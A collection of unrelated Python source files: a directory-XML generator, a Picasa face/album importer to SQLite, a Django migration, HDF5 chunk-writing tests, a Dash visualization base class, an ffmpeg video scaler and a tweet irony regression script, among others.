for i in range(1, len(readmeItems)): #items for required entry start at list index 1 since there is no index entry, checks type for each item
itemType = checkType(directory, readmeItems[i])
xml.write("\t\t<" + itemType + ">" + readmeItems[i] + "</" + itemType + ">\n")
xml.write("\t</required>\n")
#adds other node to dir.xml
def other(directory, xml):
xml.write("\t<other>\n")
if (os.path.isfile(os.path.join(directory, "README"))): #if README file exists, check for duplicate items
readme = open(os.path.join(directory, "README"), "r")
readmeString = readme.read()
readme.close()
readmeItems = list(filter(None, re.split("[:\n]+", readmeString)))
otherItems = os.listdir(directory)
items = [i for i in otherItems if i not in readmeItems] #omit items in README for other entry
else:
items = os.listdir(directory) #if no README file exists, no need to check for duplicate items
items.remove("dir.xml") #do not include dir.xml
for item in items: #checks type for each item and adds to other entry
itemType = checkType(directory, item )
xml.write("\t\t<" + itemType + ">" + item + "</" + itemType + ">\n")
xml.write("\t</other>\n")
#main
def main():
rootdir = checkArg() #get root directory
dropXml(rootdir) #generates dir.xml for root directory
for root, dirs, files in os.walk(rootdir): #recursive call with os.walk() to generate dir.xml for subdirectories
dropXml(os.path.abspath(root))
if __name__ == "__main__":
main()
|
#!/usr/bin/env python2
import json
import re
import sqlite3
import os
import pprint
pp = pprint.PrettyPrinter(indent=4)
conn = sqlite3.connect('picasadb.sqlite')
cur = conn.cursor()
# Make some fresh tables using executescript()
cur.executescript('''
DROP TABLE IF EXISTS Albums;
DROP TABLE IF EXISTS Contacts;
DROP TABLE IF EXISTS Starred;
DROP TABLE IF EXISTS Albums_Files;
DROP TABLE IF EXISTS Faces_Files;
DROP TABLE IF EXISTS Faces_EXIF;
DROP VIEW IF EXISTS view_picasa;
DROP VIEW IF EXISTS view_exiftool;
DROP VIEW IF EXISTS faces;
CREATE TABLE Albums (
id TEXT UNIQUE,
name TEXT UNIQUE
);
CREATE TABLE Contacts (
id TEXT,
name TEXT
);
CREATE TABLE Starred (
file TEXT,
folder TEXT
);
CREATE TABLE Albums_Files (
file TEXT,
folder TEXT,
id TEXT
);
CREATE TABLE Faces_Files (
file TEXT,
folder TEXT,
id TEXT
);
CREATE TABLE Faces_EXIF (
file TEXT,
folder TEXT,
name TEXT
);
CREATE VIEW view_picasa AS
SELECT DISTINCT name, folder, file, folder || '/' || file AS path
FROM faces_files
JOIN contacts
ON contacts.id=faces_files.id
ORDER BY name, path
COLLATE nocase;
CREATE VIEW view_exiftool AS
SELECT DISTINCT name, folder, file, folder || '/' || file AS path
FROM faces_exif
ORDER BY name, path
COLLATE nocase;
CREATE VIEW faces AS
SELECT name, folder, file, path
FROM view_exiftool
UNION
SELECT name, folder, file, path
FROM view_picasa;
''')
with open('picasa.ini.json') as data_file:
data = json.load(data_file)
unique_header = list()
unique_album_ids = list()
unique_contacts = list()
albums = list()
starredfiles = list()
file_albums = list()
file_faces = list()
contacts = list()
for row in data:
if re.search('album', row['header'], re.IGNORECASE) and re.search('name', row['action'], re.IGNORECASE):
ID = row['header'].split(':')[1]
name = row['action'].split('=')[1]
if ID not in unique_album_ids:
#print "Album ID & Name:",ID, name
album = dict()
album['id'] = ID
album['name'] = name
unique_album_ids.append(ID)
albums.append(album)
elif re.search('Contacts2', row['header'], re.IGNORECASE):
id = row['action'].split('=')[0]
name = row['action'].split('=')[1].split(';')[0]
#print row['action']
if id not in unique_contacts:
#print "Contact ID & Name:",id, name
contact = dict()
contact['id'] = id
contact['name'] = name
unique_contacts.append(id)
contacts.append(contact)
elif re.search('jpe*g', row['header'], re.IGNORECASE) and re.search('star=yes', row['action'], re.IGNORECASE):
#print "Starred File:", row['folder'], row['header']
starred = dict()
starred['file'] = row['header']
starred['folder'] = row['folder']
starredfiles.append(starred)
elif re.search('jpe*g', row['header'], re.IGNORECASE) and re.search('albums', row['action'], re.IGNORECASE):
ids = row['action'].split('=')[1].split(',')
for id in ids:
#print row['folder'], row['header'], id
file_album = dict()
file_album['file'] = row['header']
file_album['folder'] = row['folder']
file_album['id'] = id
file_albums.append(file_album)
elif re.search('jpe*g', row['header'], re.IGNORECASE) and re.search('faces', row['action'], re.IGNORECASE):
faces = row['action'].split('=')[1].split(';')
#print faces
for face in faces:
#print row['folder'], row['header'], face.split(',')[1]
file_face = dict()
file_face['file'] = row['header']
file_face['folder'] = row['folder']
file_face['id'] = face.split(',')[1]
file_faces.append(file_face)
print "Inserting Albums..."
for i in albums:
#print "album:", i['id'], i['name']
cur.execute('''INSERT INTO Albums (id, name)
VALUES ( ?, ? )''', (i['id'], i['name'] ) )
conn.commit()
print "Inserting Contacts..."
for i in contacts:
#print "contact:", i['id'], i['name']
cur.execute('''INSERT INTO Contacts (id, name)
VALUES ( ?, ? )''', (i['id'], i['name'] ) )
conn.commit()
print "Inserting Starred Files..."
for i in starredfiles:
#print "starred:", i['folder'], i['file']
cur.execute('''INSERT INTO Starred (file, folder)
VALUES ( ?, ? )''',( i['file'], i['folder'] ) )
conn.commit()
print "Inserting Album Content..."
for i in file_albums:
#print "file_album:", i['folder'], i['file'], i['id']
cur.execute('''INSERT INTO Albums_Files (file, folder, id)
VALUES ( ?, ?, ? )''',( i['file'], i['folder'], i['id'] ) )
conn.commit()
print "Inserting Face Content..."
for i in file_faces:
#print "file_face:", i['folder'], i['file'], i['id']
cur.execute('''INSERT INTO Faces_Files (file, folder, id)
VALUES ( ?, ?, ? )''',( i['file'], i['folder'], i['id'] ) )
conn.commit()
with open('exiftool.json') as edata_file:
rawdata = json.load(edata_file)
edata = list()
for row in rawdata:
image = row.get('SourceFile')
region = row.get('RegionName')
if region is not None:
if type(region) is list:
for person in region:
edata.append({'PersonName': person, 'FileName': os.path.basename(image), 'FolderName': os.path.dirname(image)})
else:
edata.append({'PersonName': region, 'FileName': os.path.basename(image), 'FolderName': os.path.dirname(image)})
#pp.pprint(edata)
print "Inserting EXIF Face Content..."
for i in edata:
cur.execute('''INSERT INTO Faces_EXIF (file, folder, name)
VALUES ( ?, ?, ? )''',( i['FileName'], i['FolderName'], i['PersonName'] ) )
conn.commit()
|
# Generated by Django 2.1 on 2018-09-24 06:31
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('mainapp', '0012_auto_20180924_0625'),
]
operations = [
migrations.RemoveField(
model_name='category',
name='image',
),
migrations.RemoveField(
model_name='category',
name='related',
),
]
|
import os, glob
import numpy as np
from ..algorithms.utils import get_file_manager
from ..algorithms.clustered_writes import *
from ..exp_utils import create_empty_dir
def test_get_entity_sizes():
# in C order
bytes_per_voxel = 1
R = (10,9,10)
cs = (5,3,2)
partition = (2,3,5)
bs, brs, bss = get_entity_sizes(cs, bytes_per_voxel, partition)
assert bs == 5*3*2
assert brs == 5*3*2*5
assert bss == 5*3*2*5*3
def test_get_strategy():
# in C order
bytes_per_voxel = 1
R = (20,9,10)
cs = (5,3,2)
partition = (4,3,5)
bs, brs, bss = get_entity_sizes(cs, bytes_per_voxel, partition)
test_case = {
5*2*3: 0, # 1 block
5*2*3*4: 0, # 4 blocks
5*2*3*5: 1, # 1 row
5*2*3*5*2: 1, # 2 rows
5*2*3*5*3: 2, # 1 slice
5*2*3*5*3*3: 2, # 3 slices
5*2*3*5*3*4: 2, # whole img
5*2*3*5*3*7: 2, # whole img (more mem than necessary)
}
for buffer_mem_size, expected in test_case.items():
strategy = get_strategy(buffer_mem_size, bs, brs, bss)
assert strategy == expected
def test_compute_buffers():
# in C order
bytes_per_voxel = 1
R = (20,9,10)
cs = (5,3,2)
partition = (4,3,5)
bs, brs, bss = get_entity_sizes(cs, bytes_per_voxel, partition)
origarr_size = R[0]*R[1]*R[2]*bytes_per_voxel
test_case = {
5*2*3: 4*3*5, # 1 block
5*2*3*4: 4*3*2, # 4 blocks
5*2*3*5: 4*3, # 1 row
5*2*3*5*2: 4*2, # 2 rows
5*2*3*5*3: 4, # 1 slice
5*2*3*5*3*3: 2, # 3 slices
5*2*3*5*3*4: 1, # whole img
5*2*3*5*3*7: 1, # whole img (more mem than necessary)
}
for buffer_mem_size, expected in test_case.items():
strategy = get_strategy(buffer_mem_size, bs, brs, bss)
buffers = compute_buffers(buffer_mem_size, strategy, origarr_size, cs, bs, brs, bss, partition, R, bytes_per_voxel)
# test number of buffers
nb_buffers = len(buffers.values())
assert nb_buffers == expected
def test_clustered_writes():
bpv = 1
R = (20,9,10)
cs = (5,3,2)
ff = 'HDF5'
outdir_path = './outdir'
test_case = [
5*3*2, # 1 block
5*3*2*4, # 4 blocks
5*3*2*5, # 1 row
5*3*2*5*2, # 2 rows
5*3*2*5*3, # 1 slice
5*3*2*5*3*3, # 3 slices
5*3*2*5*3*4, # whole img
5*3*2*5*3*7, # whole img (more mem than necessary)
]
nb_chunks = 4*3*5
# create input array
origarr_filepath = './original_array.hdf5'
data = np.random.normal(size=R)
fm = get_file_manager(ff)
if os.path.isfile(origarr_filepath):
os.remove(origarr_filepath)
fm.write(origarr_filepath, data, R, _slices=None)
for m in test_case:
create_empty_dir(outdir_path)
clustered_writes(origarr_filepath, R, cs, bpv, m, ff, outdir_path)
workdir = os.getcwd()
os.chdir(outdir_path)
filenames = list()
for filename in glob.glob("*.hdf5"):
arr = fm.read_all(filename)
assert arr.shape == cs
filenames.append(filename)
assert len(filenames) == nb_chunks
os.chdir(workdir)
|
#!/usr/bin/python
import sys
if __name__ == "__main__":
#full_msg = sys.stdin.read()
f = open("parseout.txt",'w')
f.write("SUCCESS")
f.close()
|
import os, sys
WORKING_DIR = getattr(sys, '_MEIPASS', os.getcwd())
APPLICATION_DIR = os.path.join(os.path.dirname(os.path.realpath(__file__)), "js_app")
NODE_MODULES = os.path.join(APPLICATION_DIR, "node_modules")
PACKAGE_JSON = os.path.join(APPLICATION_DIR, "package.json")
ELECTRON_DIR = os.path.join(WORKING_DIR, "electron_build")
ELECTRON_ASAR_DEPLOY_PATH = os.path.join(ELECTRON_DIR, "resources", "app.asar")
|
import os
import threading
import time
import dash_bootstrap_components as dbc
from dash import Dash, html
from rubicon_ml import __version__ as rubicon_ml_version
_next_available_port = 8050
class VizBase:
"""The base class for all `rubicon_ml` visualizations.
`VizBase` can not be directly instantatied. New widgets must all
extend `VizBase`.
"""
def __init__(
self,
dash_title="base",
):
self.dash_title = f"rubicon-ml: {dash_title}"
@property
def layout(self):
raise NotImplementedError("extensions of `VizBase` must implement property `layout(self)`")
def build_layout(self):
"""Wraps the layout defined by `self.layout` in a container providing
the `rubicon_ml` header.
"""
self.app.layout = dbc.Card(
dbc.CardBody(
[
dbc.Row(
[
html.Img(
id="rubicon-logo-img",
src=self.app.get_asset_url("images/rubicon-logo-dark.png"),
),
],
),
dbc.Row(html.P(rubicon_ml_version, id="version-text"), id="version-row"),
dbc.Row(self.layout),
],
id="frame",
),
)
def load_experiment_data(self):
raise NotImplementedError(
"extensions of `VizBase` must implement `load_experiment_data(self)`"
)
def register_callbacks(self, link_experiment_table=False):
raise NotImplementedError(
"extensions of `VizBase` must implement `register_callbacks(self)`"
)
def serve(self, in_background=False, dash_kwargs={}, run_server_kwargs={}):
"""Serve the Dash app on the next available port to render the visualization.
Parameters
----------
in_background : bool, optional
True to run the Dash app on a thread and return execution to the
interpreter. False to run the Dash app inline and block execution.
Defaults to False.
dash_kwargs : dict, optional
Keyword arguments to be passed along to the newly instantiated
Dash object. Available options can be found at
https://dash.plotly.com/reference#dash.dash.
run_server_kwargs : dict, optional
Keyword arguments to be passed along to `Dash.run_server`.
Available options can be found at
https://dash.plotly.com/reference#app.run_server. Most commonly,
the 'port' argument can be provided here to serve the app on a
specific port.
"""
if self.experiments is None:
raise RuntimeError(
f"`{self.__class__}.experiments` can not be None when `serve` is called"
)
self.app = Dash(
__name__,
external_stylesheets=[dbc.themes.LUX, dbc.icons.BOOTSTRAP],
title=self.dash_title,
**dash_kwargs,
)
self.load_experiment_data()
self.build_layout()
self.register_callbacks()
global _next_available_port
default_run_server_kwargs = {
"dev_tools_silence_routes_logging": True,
"port": _next_available_port,
}
default_run_server_kwargs.update(run_server_kwargs)
_next_available_port = default_run_server_kwargs["port"] + 1
if in_background:
running_server_thread = threading.Thread(
name="run_server",
target=self.app.run_server,
kwargs=default_run_server_kwargs,
)
running_server_thread.daemon = True
running_server_thread.start()
port = default_run_server_kwargs.get("port")
if "proxy" in run_server_kwargs:
host = default_run_server_kwargs.get("proxy").split("::")[-1]
else:
host = f"http://localhost:{port}"
time.sleep(0.1) # wait for thread to see if requested port is available
if not running_server_thread.is_alive():
raise RuntimeError(f"port {port} may already be in use")
return host
else:
self.app.run_server(**default_run_server_kwargs)
def show(self, i_frame_kwargs={}, dash_kwargs={}, run_server_kwargs={}):
"""Show the Dash app inline in a Jupyter notebook.
Parameters
----------
i_frame_kwargs : dict, optional
Keyword arguments to be passed along to the newly instantiated
IFrame object. Available options include 'height' and 'width'.
dash_kwargs : dict, optional
Keyword arguments to be passed along to the newly instantiated
Dash object. Available options can be found at
https://dash.plotly.com/reference#dash.dash.
run_server_kwargs : dict, optional
Keyword arguments to be passed along to `Dash.run_server`.
Available options can be found at
https://dash.plotly.com/reference#app.run_server. Most commonly,
the 'port' argument can be provided here to serve the app on a
specific port.
"""
from IPython.display import IFrame
host = self.serve(
in_background=True, dash_kwargs=dash_kwargs, run_server_kwargs=run_server_kwargs
)
proxied_host = os.path.join(host, self.app.config["requests_pathname_prefix"].lstrip("/"))
default_i_frame_kwargs = {
"height": "600px",
"width": "100%",
}
default_i_frame_kwargs.update(i_frame_kwargs)
return IFrame(proxied_host, **default_i_frame_kwargs)
|
"""
This takes an array of numbers and finds the max product of 3 numbers.
"""
def maxProductFinder(l):
sortL = sorted(l)
product = 0
print(sortL)
product += max(sortL)
print(product)
print(sortL[0] * sortL[1])
print(sortL)
if (sortL[0] * sortL[1]) > sortL[len(sortL)- 2] * sortL[(len(sortL) - 3)]:
product *= sortL[0]*sortL[1]
else:
product *= sortL[len(sortL)- 2]*sortL[(len(sortL) - 3)]
return product
test = [-6, -8, 4, 2, 5, 3, -1, 9, 10]
print(maxProductFinder(test))
|
from ffmpy import FFmpeg
import io
from fileModule import FileManager
from subprocess import PIPE, call
call(["chmod", "+x", "ffmpeg"])
def main(args):
inId = args["videoID"]
inconf = ""
outconf = "-f mpegts -vf scale=320:-1"
fm = FileManager()
data = fm.loadFile(inId)
datared = data.read()
ff = FFmpeg(
inputs={"pipe:0": inconf},
outputs={"pipe:1": outconf})
o1, o2 = ff.run(input_data=datared, stdout=PIPE)
bs = io.BytesIO(o1)
outId = fm.saveFile(bs, "res-" + data.filename)
return {"videoID": outId}
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import argparse
import codecs
import sys
import numpy as np
import re
import math
import preproc
from sklearn.preprocessing import LabelEncoder
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.feature_extraction import DictVectorizer
from sklearn.linear_model import Ridge, LinearRegression, LogisticRegression, RidgeCV, Lasso, ElasticNet, BayesianRidge
from sklearn.metrics import classification_report, confusion_matrix, accuracy_score
from sklearn.metrics import mean_absolute_error, mean_squared_error,r2_score
from sklearn.metrics.pairwise import cosine_similarity
from scipy.stats import pearsonr
from sklearn import cross_validation
from sklearn.pipeline import FeatureUnion
from collections import Counter
import pandas as pd
import pylab as plt
from sklearn import decomposition
from sklearn.mixture import GMM
def getFeatures(inputd,cluster=None,noGrep=False,ngram="1-2-3",gmm=None):
features=[]
if cluster:
clusterids=set(cluster.values())
print gmm
for i, tweet in enumerate(inputd):
d={}
tweet="<S> "+tweet+" </S>"
words=tweet.split(" ")
words = [w for w in words if w not in ENGLISH_STOP_WORDS]
# ngram features (G)
for i in range(len(words)) :
# up to N n-grams
for n in ngram.split("-"):
gram = "G "
N=int(n)
for j in range(i,min(i+N, len(words))) :
gram += words[j] + " "
if len(gram.split(" "))==N+2:
d[gram]=1 #binary
# number of ONLY upcased words (U)
d["W upper"] = sum(all(c.isupper() for c in w) for w in words)
# punctuation:
# p1: the number of contiguous sequences of
# exclamation marks, p2: question marks, and
# p3: both exclamation and question marks;
# p4: ? or ! in last token
d["P P!"] = len(re.findall('[!]+',tweet))
d["P P?"] = len(re.findall('[?]+',tweet))
d["P P!?"] = len(re.findall('[!?]*(!+\?+)[!?]*|[!?]*(\?+!+)[!?]*',tweet))
d["P Pl!?"] = len(re.findall('[!?]+',tweet))
### gmm
try:
values = gmm[i]
for idx, v in enumerate(values):
d["gmm{}".format(idx)]=v
except:
donotadd=1
# Brown clusters (B)
# presence or absence of tokens in cluster
if cluster:
active_clusters = [cluster[w] for w in words if w in cluster]
for c in clusterids:
if c in active_clusters:
d["B "+c]=1
# wordsLower = [x.lower() for x in words]
# # skip gram features (S) on lower-cased words
# for i in range(len(wordsLower)) :
# if i+2 < len(wordsLower) :
# gram="S " + wordsLower[i] + " * " + wordsLower[i+2]
# d[gram]=d.get(gram,0)+1
# if i+3 < len(wordsLower) :
# gram="S " + wordsLower[i] + " * " + wordsLower[i+2]+ " " + wordsLower[i+3]
# d[gram]=d.get(gram,0)+1
# gram="S " + wordsLower[i] + " " + wordsLower[i+1]+ " * " + wordsLower[i+3]
# d[gram]=d.get(gram,0)+1
if not noGrep:
# "grep label"
d['label']=findMatching(tweet)
features.append(d)
return features
def findMatching(line):
#### list of regexes ###
pSarc=re.compile("#sarcas",re.IGNORECASE) # to catch #sarcasm #sarcas #sarcastic #sarcastictweet
pIron=re.compile("#iron(y|ic)",re.IGNORECASE)
pNot=re.compile("#not",re.IGNORECASE)
pLiterally=re.compile(r"\bliterally\b",re.IGNORECASE)
pVirtually=re.compile(r"\bvirtually\b",re.IGNORECASE)
pYeahright=re.compile("#yeahright",re.IGNORECASE)
pOhyoumust=re.compile("Oh.*you must",re.IGNORECASE)
pAsXas=re.compile(r"\bas .* as\b",re.IGNORECASE)
pSotospeak=re.compile(r"\bso to speak\b",re.IGNORECASE)
pDontyoulove=re.compile(r"\bdon't you love\b",re.IGNORECASE)
pProverbial=re.compile(r"\bproverbial\b",re.IGNORECASE)
pJustkidding=re.compile("#justkidding",re.IGNORECASE)
pNot2=re.compile(r"\bnot\b",re.IGNORECASE)
pAbout=re.compile(r"\babout\b",re.IGNORECASE)
pOh=re.compile(r"\boh\b",re.IGNORECASE)
DEFAULT="NOLABEL"
if pSarc.search(line):
return "sarcasm"
elif pIron.search(line):
return "iron"
elif pNot.search(line):
return "not"
elif pLiterally.search(line):
return "literally"
elif pVirtually.search(line):
return "virtually"
elif pYeahright.search(line):
return "yeahright"
elif pOhyoumust.search(line):
return "ohyoumust"
elif pAsXas.search(line):
return "asXas"
elif pSotospeak.search(line):
return "sotospeak"
elif pDontyoulove.search(line):
return "dontyoulove"
elif pProverbial.search(line):
return "proverbial"
elif pJustkidding.search(line):
return "justkidding"
elif pNot2.search(line):
return "not2"
elif pAbout.search(line):
return "about"
elif pOh.search(line):
return "oh"
else:
return DEFAULT
def main():
parser = argparse.ArgumentParser(description="Ridge regression model")
parser.add_argument('train', help="train data")
parser.add_argument('test', help="test data")
parser.add_argument('--seed', help="random seed",type=int,default=987654321)
parser.add_argument('--debug', help="debug", action='store_true', default=False)
parser.add_argument('--removeHashTags', help="removeHashTags", action='store_true', default=False)
parser.add_argument('--cv', help="run cross-validation", action='store_true', default=False)
parser.add_argument('--cvp', help="output Lcv scores", action='store_true', default=False)
parser.add_argument('--alpha', help="alpha parameter", type=float, default=1)
parser.add_argument('--classweight', help="class weight for +/- classifier", type=float, default=22)
parser.add_argument('--out', help="output gold and predictions", action='store_true', default=False)
parser.add_argument('--compare', help="compare to linReg", action='store_true', default=False)
parser.add_argument('--pred', help="output predictions", action='store_true', default=False)
parser.add_argument('--plot', help="plot predictions", action='store_true', default=False)
parser.add_argument('--noGrep', help="no label feats", action='store_true', default=False)
parser.add_argument('--cluster', help="brown clusters", type=str)
parser.add_argument('--ngram', help="n-grams", type=str,default="1-2-3")
parser.add_argument('-c','--components', help="num PCA components", type=int, default=100)
parser.add_argument('-g','--gmmcomponents', help="num GMM components", type=int, default=12)
parser.add_argument('--gmm', help="add gmm features", action='store_true', default=False)
args = parser.parse_args()
####### load data
tweetids,inputd,labels=read_data_file(args.train,args.removeHashTags)
tweetids=np.array(tweetids)
print >>sys.stderr, "{} instances loaded.".format(len(inputd))
print >>sys.stderr, u"Instance: {} {}".format(labels[-2],inputd[-2])
np.random.seed(args.seed)
data ={}
print >>sys.stderr, len(labels)
# target labels
data['target'] = np.array(labels)
vectorizer=DictVectorizer()
vectorizernogmm=DictVectorizer()
cluster=None
if args.cluster:
word2clusters = {}
for l in map(str.strip,open(args.cluster).readlines()) :
bitstring,word,count = l.split("\t")
word2clusters[word] = bitstring
cluster=word2clusters
gmm_predicted=[]
if args.gmm:
## get features for gmm
X_train_dict = getFeatures(inputd,cluster=cluster,noGrep=args.noGrep,ngram=args.ngram)
X_train = vectorizernogmm.fit_transform(X_train_dict)
pca = decomposition.RandomizedPCA(n_components=args.components)
X_train_pca = pca.fit_transform(X_train)
print X_train_pca
gmm = GMM(n_components = args.gmmcomponents,
covariance_type = "full",
min_covar = 0.01)
gmm.fit(X_train_pca)
PASTE=1
gmm_predicted=gmm.predict_proba(X_train_pca)
print gmm_predicted
X_train_dict = getFeatures(inputd,cluster=cluster,noGrep=args.noGrep,ngram=args.ngram,gmm=gmm_predicted)
print >>sys.stderr, u"Features: {}".format(X_train_dict[-2])
data['data'] = vectorizer.fit_transform(X_train_dict)
#print vectorizer.vocabulary_
if args.cv:
num_inst=len(labels)
train_cv={}
cross=cross_validation.KFold(len(labels),n_folds=10)
acc=[]
for train_index, test_index in cross:
if args.debug:
print("TRAIN:", len(train_index), "TEST:", len(test_index))
X=data['data']
y=data['target']
X_train, X_test = X[train_index], X[test_index]
y_train, y_test = y[train_index], y[test_index]
model= Ridge(alpha=args.alpha)
model.fit(X_train,y_train)
y_pred= model.predict(X_test)
assert(len(y_pred)==len(test_index))
tids=tweetids[test_index]
for twid,pred in zip(tids,y_pred):
train_cv[twid] = pred
y_pred_official=[math.floor(x + 0.5) for x in y_pred]
y_gold_official=[math.floor(x + 0.5) for x in y_test]
acc.append(cosine_similarity(y_gold_official,y_pred_official)[0][0])
if args.debug:
evaluate(y_test,y_pred,plot=args.plot)
print >>sys.stderr, "Cosine of 10-folds:", acc
print >>sys.stderr, "Macro average:", np.mean(np.array(acc)), np.std(np.array(acc))
if args.cvp:
for twid in tweetids:
print "{}\t{}".format(twid,train_cv[twid])
### test data
tweetids,testd,y_test=read_data_file(args.test,args.removeHashTags)
if args.gmm:
## get features for gmm on test data
X_test_dict = getFeatures(testd,cluster=cluster,noGrep=args.noGrep,ngram=args.ngram) #without gmm
X_test=vectorizernogmm.transform(X_test_dict)
X_test_pca = pca.transform(X_test)
gmm_predicted=gmm.predict_proba(X_test_pca)
print gmm_predicted
X_test_dict = getFeatures(testd,cluster=cluster,noGrep=args.noGrep,ngram=args.ngram,gmm=gmm_predicted)
X_test=vectorizer.transform(X_test_dict)
print >>sys.stderr, "Train on whole, eval on trial"
if args.compare:
print "LinearReg"
model=LinearRegression()
model.fit(data['data'],data['target'])
y_pred= model.predict(X_test)
evaluate(y_test,y_pred)
print >>sys.stderr, "Ridge"
#model=RidgeCV([0.00000001,0.001,0.01,0.0001,0.1,1.0,1.5,2,10]) #alpha=args.alpha)
model=Ridge(alpha=args.alpha)
#model=Lasso(alpha=args.alpha)
#model=ElasticNet(alpha=args.alpha, l1_ratio=0.7)
model.fit(data['data'],data['target'])
y_pred= model.predict(X_test)
y_pred=y_pred
evaluate(y_test,y_pred,plot=args.plot)
show_most_informative_features(vectorizer,model)
#from sklearn.grid_search import GridSearchCV
alphas = np.array([1,0.1,0.01,0.001,0.0001,0])
# create and fit a ridge regression model, testing each alpha
#model = Ridge()
#grid = GridSearchCV(estimator=model, param_grid=dict(alpha=alphas))
#grid.fit(X_all,y_all)
#print(grid)
# summarize the results of the grid search
#print(grid.best_score_)
#print(grid.best_estimator_.alpha)
print >>sys.stderr,"coef_:",model.coef_
print >>sys.stderr,model
if args.out:
for i,j in zip(y_test,y_pred):
print i,j
if args.pred and not args.out:
for i,val in enumerate(y_pred):
print u"{}\t{}\t{}".format(tweetids[i],val,inputd[i])
## use +/- classifier label and stacking
# echo "TO FINISH..."
# cross=cross_validation.KFold(len(labels),n_folds=10)
# acc=[]
# plusminuslabels=np.zeros(len(data['target']))*-1
# for train_index, test_index in cross:
# X=data['data']
# y=data['target']
# X_train, X_test = X[train_index], X[test_index]
# y_train, y_test = y[train_index], y[test_index]
# y_train=[0 if x < 0 else 1 for x in y_train]
# y_test=[0 if x < 0 else 1 for x in y_test]
# print >>sys.stderr, Counter(y_train)
# classifier= LogisticRegression(class_weight={0: args.classweight})
# #classifier= LogisticRegression()
# classifier.fit(X_train,y_train)
# class_pred=classifier.predict(X_test)
# print >>sys.stderr, "accuracy for +/-: {}".format(accuracy_score(y_test,class_pred))
# plusminuslabels[test_index] = class_pred
# print plusminuslabels
# print len(plusminuslabels)
# y_train=[0 if x < 0 else 1 for x in data['target']]
# print Counter(plusminuslabels)
# print >>sys.stderr, "accuracy for +/-: {}".format(accuracy_score(y_train,plusminuslabels))
## create pandas object
#dat=pd.DataFrame(data=plusminuslabels,columns=["pm"])
#plusminusdict=dat.T.to_dict().values() #transpose! (to not have indices as keys)
#print plusminusdict
#plusmins=DictVectorizer(plusminusdict)
##### add plusminus as additional feature
#vectorizer=FeatureUnion([("pm",plusmins),("w",vectorizerWord)])
#data['data'] = vectorizer.fit_transform(inputd)
def evaluate(y_gold,y_pred,plot=False):
print >>sys.stderr, "mean absolute error", mean_absolute_error(y_gold, y_pred)
print >>sys.stderr, "MSE", mean_squared_error(y_gold, y_pred)
print >>sys.stderr, "R2", r2_score(y_gold, y_pred)
r_row, p_value = pearsonr(y_gold,y_pred)
print >>sys.stderr, "Pearsonr {}".format(r_row)
print >>sys.stderr, "Cosine", cosine_similarity(y_gold,y_pred)[0][0]
y_pred_official=[math.floor(x + 0.5) for x in y_pred]
y_gold_official=[math.floor(x + 0.5) for x in y_gold]
print >>sys.stderr, "Cosine official (rounded)", cosine_similarity(y_gold_official,y_pred_official)[0][0]
if plot:
plt.subplot(2, 1, 1)
plt.scatter(y_gold,y_pred)
plt.subplot(2, 1, 2)
plt.scatter(y_gold_official,y_pred_official)
plt.show()
def read_data_file(datafile,removeHashTags):
inputd=[]
labels=[]
tweetids=[]
for line in codecs.open(datafile,encoding="utf-8"):
id,label,text=line.strip().split("\t",2)
tweet = preproc.replace_user_tags(text)
if removeHashTags == True:
tweet = removeHashTags(tweet)
labels.append(float(label))
inputd.append(tweet)
tweetids.append(id)
assert(len(inputd)==len(labels))
return tweetids,inputd, labels
def show_most_informative_features(vectorizer, clf, n=10):
feature_names = vectorizer.get_feature_names()
coefs_with_fns = sorted(zip(clf.coef_, feature_names))
top = zip(coefs_with_fns[:n], coefs_with_fns[:-(n + 1):-1])
for (coef_1, fn_1), (coef_2, fn_2) in top:
print >>sys.stderr,"\t%.4f\t%-15s\t\t%.4f\t%-15s" % (coef_1, fn_1, coef_2, fn_2)
# This list of English stop words is taken from the "Glasgow Information
# Retrieval Group". The original list can be found at
# http://ir.dcs.gla.ac.uk/resources/linguistic_utils/stop_words
ENGLISH_STOP_WORDS = frozenset([
"a", "about", "above", "across", "after", "afterwards", "again", "against",
"all", "almost", "alone", "along", "already", "also", "although", "always",
"am", "among", "amongst", "amoungst", "amount", "an", "and", "another",
"any", "anyhow", "anyone", "anything", "anyway", "anywhere", "are",
"around", "as", "at", "back", "be", "became", "because", "become",
"becomes", "becoming", "been", "before", "beforehand", "behind", "being",
"below", "beside", "besides", "between", "beyond", "bill", "both",
"bottom", "but", "by", "call", "can", "cannot", "cant", "co", "con",
"could", "couldnt", "cry", "de", "describe", "detail", "do", "done",
"down", "due", "during", "each", "eg", "eight", "either", "eleven", "else",
"elsewhere", "empty", "enough", "etc", "even", "ever", "every", "everyone",
"everything", "everywhere", "except", "few", "fifteen", "fify", "fill",
"find", "fire", "first", "five", "for", "former", "formerly", "forty",
"found", "four", "from", "front", "full", "further", "get", "give", "go",
"had", "has", "hasnt", "have", "he", "hence", "her", "here", "hereafter",
"hereby", "herein", "hereupon", "hers", "herself", "him", "himself", "his",
"how", "however", "hundred", "i", "ie", "if", "in", "inc", "indeed",
"interest", "into", "is", "it", "its", "itself", "keep", "last", "latter",
"latterly", "least", "less", "ltd", "made", "many", "may", "me",
"meanwhile", "might", "mill", "mine", "more", "moreover", "most", "mostly",
"move", "much", "must", "my", "myself", "name", "namely", "neither",
"never", "nevertheless", "next", "nine", "no", "nobody", "none", "noone",
"nor", "not", "nothing", "now", "nowhere", "of", "off", "often", "on",
"once", "one", "only", "onto", "or", "other", "others", "otherwise", "our",
"ours", "ourselves", "out", "over", "own", "part", "per", "perhaps",
"please", "put", "rather", "re", "same", "see", "seem", "seemed",
"seeming", "seems", "serious", "several", "she", "should", "show", "side",
"since", "sincere", "six", "sixty", "so", "some", "somehow", "someone",
"something", "sometime", "sometimes", "somewhere", "still", "such",
"system", "take", "ten", "than", "that", "the", "their", "them",
"themselves", "then", "thence", "there", "thereafter", "thereby",
"therefore", "therein", "thereupon", "these", "they", "thick", "thin",
"third", "this", "those", "though", "three", "through", "throughout",
"thru", "thus", "to", "together", "too", "top", "toward", "towards",
"twelve", "twenty", "two", "un", "under", "until", "up", "upon", "us",
"very", "via", "was", "we", "well", "were", "what", "whatever", "when",
"whence", "whenever", "where", "whereafter", "whereas", "whereby",
"wherein", "whereupon", "wherever", "whether", "which", "while", "whither",
"who", "whoever", "whole", "whom", "whose", "why", "will", "with",
"within", "without", "would", "yet", "you", "your", "yours", "yourself",
"yourselves"])
if __name__=="__main__":
main()
|
import threading
from msg import *
def ProcessMessages():
while True:
m = Message.SendMessage(M_BROKER, M_GETDATA)
